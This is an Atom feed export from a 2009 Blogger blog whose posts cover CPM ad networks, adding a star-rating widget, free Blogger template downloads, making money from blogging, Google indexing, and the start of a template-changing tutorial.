ID ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-839858330884914994</id><published>2009-07-28T00:45:00.003-07:00</published><updated>2009-07-28T00:45:49.816-07:00</updated><title type='text'>What is CPM ads networks ?</title><content type='html'>Most probably your site or blog gets traffic from search engine like Google , Yahoo etc or direct referrals. Traffics from search engines can help in  CPC i.e. cost per click ads.  But visitors who visit your site regularly  like direct visitors  hardly clicks on these CPC ads. So what is the other way .To convert this type of traffics to revenue earning is by  using CPM ads .&lt;br /&gt;&lt;br /&gt;CPM ads means ads that can generate revenue  as Cost Per thousand Impressions . CPM ads are re how much one can earn when an ad gets 1000 impressions on the website. Some pays $3 or $4 per CPM.&lt;br /&gt;&lt;br /&gt;Say your site have 800 regular visitors and that generates 1100 impressions per day , in this case CPM ads are best over CPC ads.&lt;br /&gt;&lt;br /&gt;CPM ads networks can also offer Cost per Click or Cost per Action or other ads and also requires traffic requirements.&lt;br /&gt;&lt;br /&gt;Best CPM ad networks&lt;br /&gt;-TribalFusion has good cpm rates&lt;br /&gt;-BURST&lt;br /&gt;-Fastclick etc&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-839858330884914994?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/839858330884914994/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=839858330884914994' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/839858330884914994'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/839858330884914994'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/what-is-cpm-ads-networks.html' title='What is CPM ads networks ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7400946602059335582</id><published>2009-07-28T00:45:00.001-07:00</published><updated>2009-07-28T00:45:48.680-07:00</updated><title type='text'>How to add Star Rating Widget to Blooger, Wordpress, Typepad, Drupal or any other blogging Platform</title><content type='html'>You can  know how much your  readers / visitors like your blog posts ?  You can add  rating button to your blogger, wordpress, typepad, or other blog platform or any other web page , so that you will get immediate feedback from your readers .&lt;br /&gt;&lt;br /&gt;&lt;a href="http://photogalaree.blogspot.com/"&gt;Click here to view &lt;span style="font-weight: bold;"&gt;DEMO&lt;/span&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;of blog post rating widget.&lt;br /&gt;&lt;br /&gt;You like it ?&lt;br /&gt;&lt;br /&gt;Then here is the easy method -&lt;br /&gt;&lt;br /&gt;1. Login to Blogger or other platform . Here I am explaining for Blogger.&lt;br /&gt;&lt;br /&gt;2. To get this widget &lt;a style="font-weight: bold;" href="http://www.outbrain.com/get/ratings"&gt;click here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;3. Select (click) &lt;span style="font-weight: bold;"&gt;Blogger button&lt;/span&gt;. Now here are two steps . You can or cannot register . Second step is Click on &lt;span style="font-weight: bold;"&gt;Get Widget Now button&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;4. You will be directed to Blogger . From the &lt;span style="font-weight: bold;"&gt;Select a Blog list&lt;/span&gt; choose the blog you want to add 5 star rating.  You can give &lt;span style="font-weight: bold;"&gt;Title&lt;/span&gt; like &lt;span style="font-style: italic;"&gt;Rate this Post&lt;/span&gt;.  Now click on &lt;span style="font-weight: bold;"&gt;Add widget Button&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;5. Click on &lt;span style="font-weight: bold;"&gt;Save &lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tbHfaj1A058/SVH7YyN-i6I/AAAAAAAAGR8/ahuklrtsi3I/s1600-h/5+star+rating+of+blogs.JPG"&gt;&lt;img style="cursor: pointer; width: 267px; height: 59px;" src="http://1.bp.blogspot.com/_tbHfaj1A058/SVH7YyN-i6I/AAAAAAAAGR8/ahuklrtsi3I/s320/5+star+rating+of+blogs.JPG" alt="" id="BLOGGER_PHOTO_ID_5283280241098132386" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;View your blog .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7400946602059335582?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7400946602059335582/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7400946602059335582' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7400946602059335582'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7400946602059335582'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-star-rating-widget-to.html' title='How to add Star Rating Widget to Blooger, Wordpress, Typepad, Drupal or any other blogging Platform'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tbHfaj1A058/SVH7YyN-i6I/AAAAAAAAGR8/ahuklrtsi3I/s72-c/5+star+rating+of+blogs.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-9005119151353769671</id><published>2009-07-26T10:16:00.035-07:00</published><updated>2009-07-26T10:16:18.206-07:00</updated><title type='text'>10 free 2 Column Blogger Templates</title><content type='html'>Many of the bloggers using Blogger don't like the default templates provided.&lt;br /&gt;&lt;br /&gt;Hence here I am providing 10 free Blogger templates.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2 Column Blogger Templates&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://darkspark-btemplates.blogspot.com/" target="_blank"&gt;&lt;b&gt;1. Darkspark&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/Darkspark.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Author &lt;/b&gt;- &lt;a href="http://www.aborregate.com/" target="_blank"&gt;Aborregate&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;a href="http://docs.google.com/View?docID=ac5m4dxmjw6b_271gn7v5kdc&amp;amp;hgd=1" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. MushBlue&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/musbluewp6.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://lifewg.googlepages.com/mushblue-blogger-template.xml" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;3. Blogy Natural&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/naturaljr9.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://plantillasblogyweb.googlepages.com/Blogy-Natural-blogyweb.blogspot.com.zip" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;4. Red &amp;amp; White&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/rednwhite.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;a href="http://www.jackbook.com/2007/08/red-white-web-20-blogger-template.html#updates" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.jackbook.com/2007/08/red-white-web-20-blogger-template.html#updates" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt; 5. Jeans&lt;br /&gt;&lt;a href="http://jeans3c-btemplates.blogspot.com/" target="_blank"&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/jeans.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Author - &lt;a href="http://www.infocreek.com/" target="_blank"&gt;Infocreek&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://docs.google.com/View?docID=ac5m4dxmjw6b_270c5f637f7&amp;amp;hgd=1" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;6. iPhone&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/iphoneem4.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.jackbook.com/download/iphone-blogger-template-1.zip" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;7. Integral&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/integralrf4.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://blogandweb.com/2007/05/13/plantilla-blogy-integral/" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;8. Minyx&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/minyxjs0.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://blogandweb.com/2007/06/03/plantilla-blogy-minyx/" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt; 9.Emire&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/emirend5.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.geckoandfly.com/2007/05/11/emire-blogger-xml-template/" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;br /&gt;&lt;a href="http://iblocktemplate.blogspot.com/" target="_blank"&gt;10. iBlock for iPhone&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/iblock.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://docs.google.com/View?docID=ac5m4dxmjw6b_272ggczkwhr&amp;amp;hgd=1" target="_blank"&gt;Click To Download.&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-9005119151353769671?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/9005119151353769671/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=9005119151353769671' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/9005119151353769671'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/9005119151353769671'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/10-free-2-column-blogger-templates.html' title='10 free 2 Column Blogger Templates'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3080531402103724601</id><published>2009-07-26T10:16:00.033-07:00</published><updated>2009-07-26T10:16:17.243-07:00</updated><title type='text'>Free 3 column Blogger Template - Garland</title><content type='html'>Here I found a nice 3 column template for the Blogger with blue and white combination.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Name - &lt;/span&gt;Garland.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://i198.photobucket.com/albums/aa309/drraman007/garland.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://webmasters-forum.org/attachment.php?attachmentid=2&amp;amp;d=1214146468"&gt;&lt;span style="font-weight: bold;"&gt;Click to Download.&lt;/span&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3080531402103724601?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3080531402103724601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3080531402103724601' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3080531402103724601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3080531402103724601'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/free-3-column-blogger-template-garland.html' title='Free 3 column Blogger Template - Garland'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4503066178454057435</id><published>2009-07-26T10:16:00.031-07:00</published><updated>2009-07-26T10:16:16.213-07:00</updated><title type='text'>Making Money by Blogging.</title><content type='html'>With a boom in the Information and technology there have been a great increase in the internet access.This had given rise to a new industry - "Internet Marketing",which is acheiving new highs these days.&lt;br /&gt;&lt;br /&gt;According to Internet Advertising Bureau, this market has crossed £2 billion barrier in the year 2006 and is now heading towards £5 billion.Now everyone having a single page webpage is showing ads to earn some revenue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Blogs as your money maker.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;These days many people prefer blogs over websites.Because it's easy to use,requires no technical knowledge and above all it can be FREE.&lt;br /&gt;&lt;br /&gt;  While initially people took blogging as a part time work,but realizing it's great  potential many people have quit there jobs and have become full-time bloggers.&lt;br /&gt;&lt;br /&gt;Here are few examples -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;John Chow - http://www.johnchow.com/&lt;/li&gt;&lt;li&gt;Jeremy Schoemaker - http://www.shoemoney.com&lt;/li&gt;&lt;li&gt;Darren Rowse - http://www.problogger.net/&lt;/li&gt;&lt;/ol&gt;These guys earn thousands of dollars per month(may be per day) from there blogs.&lt;br /&gt;&lt;br /&gt;Though it requires lots of patience,but once your blog is set and getting good traffic,you can get very good returns.But like every job it requires hardwork.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Where to start ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;There are many blogging platforms available over the internet.But here are few who I think are the biggest players.&lt;br /&gt;&lt;ol style="list-style-type: decimal;"&gt;&lt;li&gt;Blogger.com&lt;/li&gt;&lt;li&gt;Wordpress.com&lt;/li&gt;&lt;li&gt;Typepad.com&lt;/li&gt;&lt;li&gt;Tripod.com&lt;/li&gt;&lt;li&gt;Squarespace.com&lt;/li&gt;&lt;/ol&gt;You can get complete list &lt;a href="http://free-blogger-help.blogspot.com/2008/07/complete-list-free-blogging-platforms.html"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Of  these except TypePad others are free.&lt;br /&gt;&lt;br /&gt;Of the above 5 my favourites are &lt;a href="http://www.blogger.com/"&gt;Blogger&lt;/a&gt; and &lt;a href="http://wordpress.com/"&gt;Wordpress&lt;/a&gt;.But I'll recommend you to use &lt;a href="http://www.blogger.com/"&gt;Blogge&lt;/a&gt;&lt;a href="http://www.blogger.com/"&gt;r&lt;/a&gt; because,in addition of being free it allows you to add HTML ads to your blog,which is not available at wordpress.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Various Advertising networks for Blogs.&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="https://www.google.com/adsense"&gt;&lt;span style="font-weight: bold;"&gt;Google Adsense.-&lt;/span&gt;&lt;/a&gt;The biggest Online Advertising Network on this Planet Earth.&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.adbrite.com/"&gt;&lt;span style="font-weight: bold;"&gt;Adbrite &lt;/span&gt;&lt;/a&gt;- Good Adsense alternative for those who have been banned from Adsense.&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.kontera.com/"&gt;&lt;span style="font-weight: bold;"&gt;Kontera&lt;/span&gt;&lt;/a&gt; - You can use this as a supplement Adsense.&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.text-link-ads.com/"&gt;&lt;span style="font-weight: bold;"&gt;TextLinkAds&lt;/span&gt;&lt;/a&gt; - Once your blog is old having PR above 3 and Alexa rank &gt;250,000 you can use it.&lt;/li&gt;&lt;li&gt;&lt;a href="http://chitika.com/"&gt;&lt;span style="font-weight: bold;"&gt;Chitika &lt;/span&gt;&lt;/a&gt;- Mixed views from people.I used it on my other blogs but without any success.&lt;/li&gt;&lt;/ol&gt;In addition to these you can sell your adspace directly to visitors or also use some affiliate networks.&lt;br /&gt;&lt;br /&gt;Also you can show cpm ads from different networks,but they do not accept free bloghosts like blogger,wordpress etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Does it requires Technical knowledge or skills ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;No, it is not necessary that you should have technical knowledge and skills related to internet,html etc. Professionally I am Medical Student (will be a doctor in 2 years),but still I run this blog,besides this I've 5 more blogs and 1 forum.&lt;br /&gt;&lt;br /&gt;It just require your keen interest and desire to work hard and lot of patience.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4503066178454057435?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4503066178454057435/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4503066178454057435' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4503066178454057435'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4503066178454057435'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/making-money-by-blogging.html' title='Making Money by Blogging.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8595698163522517297</id><published>2009-07-26T10:16:00.029-07:00</published><updated>2009-07-26T10:16:15.091-07:00</updated><title type='text'>Four Beautiful 3 column blogger templates</title><content type='html'>Here are some more free 3 column Blogger templates for you guys.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. Comptech Blue&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_tbHfaj1A058/SHzF9-X43zI/AAAAAAAAD9Y/vf_icQyVVZU/s1600-h/comptech-blue.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5223267336348819250" style="cursor: pointer;" alt="" src="http://bp1.blogger.com/_tbHfaj1A058/SHzF9-X43zI/AAAAAAAAD9Y/vf_icQyVVZU/s400/comptech-blue.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://isnaini.googlepages.com/tech-blue.zip"&gt;Click Here To Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2.Bloggerized Adsense&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_tbHfaj1A058/SHzGuoeymfI/AAAAAAAAD9g/w2tNpIsJx2M/s1600-h/bloggerized-adsense320.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5223268172285778418" style="cursor: pointer;" alt="" src="http://bp2.blogger.com/_tbHfaj1A058/SHzGuoeymfI/AAAAAAAAD9g/w2tNpIsJx2M/s400/bloggerized-adsense320.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://isnaini.googlepages.com/tech-blue.zip"&gt;Click Here To Download&lt;/a&gt; &lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;strong&gt;3. Blogy Cultivado&lt;/strong&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_tbHfaj1A058/SH5E1-f9_nI/AAAAAAAAD-g/LKVcQMt8CTI/s1600-h/cultivado-blogandweb.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5223688311897194098" style="cursor: pointer;" alt="" src="http://bp0.blogger.com/_tbHfaj1A058/SH5E1-f9_nI/AAAAAAAAD-g/LKVcQMt8CTI/s400/cultivado-blogandweb.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;&lt;a href="http://blogy-cultivado.blogspot.com/"&gt;Demo&lt;/a&gt;  -  &lt;a href="http://blogandweb.com/wp-content/download/Blogy-Cultivado-BlogandWeb-com.zip"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;&lt;strong&gt;4. Blogy Puerto&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;&lt;a href="http://bp0.blogger.com/_tbHfaj1A058/SH5FwbnH65I/AAAAAAAAD-o/McshVgZSUgA/s1600-h/puerto-blogandweb.png"&gt;&lt;img id="BLOGGER_PHOTO_ID_5223689316144245650" style="" alt="" src="http://bp0.blogger.com/_tbHfaj1A058/SH5FwbnH65I/AAAAAAAAD-o/McshVgZSUgA/s400/puerto-blogandweb.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://blogy-puerto.blogspot.com/"&gt;Demo&lt;/a&gt;  -  &lt;a href="http://blogandweb.com/wp-content/download/Blogy-Puerto-BlogandWeb-com.zip"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;Always backup your original template before uploading a new one.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;&lt;a href="http://free-blogger-help.blogspot.com/2008/07/how-to-change-your-blogger-template.html"&gt;Click here&lt;/a&gt; for a complete step-by-step tutorial on how to change your Blogger Templates.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8595698163522517297?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8595698163522517297/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8595698163522517297' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8595698163522517297'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8595698163522517297'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/four-beautiful-3-column-blogger.html' title='Four Beautiful 3 column blogger templates'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_tbHfaj1A058/SHzF9-X43zI/AAAAAAAAD9Y/vf_icQyVVZU/s72-c/comptech-blue.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4736150815305314244</id><published>2009-07-26T10:16:00.027-07:00</published><updated>2009-07-26T10:16:14.132-07:00</updated><title type='text'>At last my blog got indexed at Google Search Engine.</title><content type='html'>Today is day 9 I am happy to see that my blog is indexed at Google Search Engine at last.&lt;br /&gt;&lt;br /&gt;During these days I added my blog to Google Webmsaters, submitted to some blog &lt;a href="http://free-blogger-help.blogspot.com/2008/07/submit-your-blog-to-high-pagerank.html"&gt;directories&lt;/a&gt; , and did some link exchange (mostly through comments) , also submitted my stories to social bookmarking sites like Digg!, Stumble! etc.&lt;br /&gt;&lt;br /&gt;I use to search everyday with my blog's add. - free-blogger-help.blogspot.com at Google, but was  always getting "No Results Found" page on Google.&lt;br /&gt;&lt;br /&gt;Some 2 days before I use get other sites linking my blog (Digg!) in the results and today I got my blog listed at Google.&lt;br /&gt;&lt;br /&gt;Since Google is the biggest search engine, getting indexed at Google is very very important for getting targetted traffic.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4736150815305314244?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4736150815305314244/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4736150815305314244' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4736150815305314244'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4736150815305314244'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/at-last-my-blog-got-indexed-at-google.html' title='At last my blog got indexed at Google Search Engine.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7905397393405225040</id><published>2009-07-26T10:16:00.025-07:00</published><updated>2009-07-26T10:16:13.033-07:00</updated><title type='text'>How to change your Blogger Template ?</title><content type='html'>This is a very frequently asked question by the beginners with blogger.Even when I was a newbie I was also confused about it.&lt;br /&gt;&lt;br /&gt;So I've decided to write a step-by-step tutorial on "How to change your Blogger Template ?".&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step I -&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;Dashboard&lt;/span&gt; &gt; &lt;span style="font-weight: bold;"&gt;Layout&lt;/span&gt; &gt; &lt;span style="font-weight: bold;"&gt;Edit HTML&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step II -&lt;/span&gt; Always backup your old template by downloading it. Click "&lt;span style="font-weight: bold;"&gt;Download Full Template&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step III -&lt;/span&gt;  Now backup all your widgets (&lt;span style="font-weight: bold;"&gt;page elements&lt;/span&gt;) by copying the code and pasting it on any text file.&lt;br /&gt;&lt;br /&gt;&lt;span 